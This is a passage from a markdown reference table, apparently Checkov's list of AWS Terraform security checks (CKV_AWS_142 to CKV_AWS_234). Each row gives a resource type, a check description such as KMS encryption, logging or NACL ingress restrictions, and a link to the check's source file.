[RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | -| 224 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | -| 225 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | -| 226 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 227 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | -| 228 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 229 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | -| 230 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | -| 231 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | -| 232 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | -| 233 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | -| 234 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 235 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | -| 236 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 237 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | -| 238 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | -| 239 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | -| 240 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | -| 241 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | -| 242 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | -| 243 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | -| 244 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | -| 245 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | -| 246 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | -| 247 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | -| 248 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | -| 249 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | -| 250 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | -| 251 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | -| 252 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | -| 253 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 254 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | -| 255 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | -| 256 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | -| 257 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | -| 258 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | -| 259 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | -| 260 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | -| 261 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 262 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 263 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | -| 264 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 265 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | -| 266 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | -| 267 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | -| 268 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | -| 269 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | -| 270 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | -| 271 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | -| 272 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | -| 273 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | -| 274 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | -| 275 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | -| 276 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | -| 277 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | -| 278 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | -| 279 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | -| 280 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | -| 281 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | -| 282 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 283 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 284 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 285 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 286 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | -| 287 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | -| 288 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | -| 289 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | -| 290 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | -| 291 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | -| 292 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | -| 293 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | -| 294 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | -| 295 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | -| 296 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | -| 297 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | -| 298 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 299 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | -| 300 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | -| 301 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | -| 302 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | -| 303 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | -| 304 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | -| 305 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | -| 306 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | -| 307 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | -| 308 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | -| 309 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | -| 310 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | -| 311 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | -| 312 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | -| 313 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | -| 314 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | -| 315 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | -| 316 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | -| 317 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 318 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | -| 319 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | -| 320 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 321 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | -| 322 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 323 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | -| 324 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 325 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | -| 326 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 327 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | -| 328 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 329 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | -| 330 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | -| 331 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | 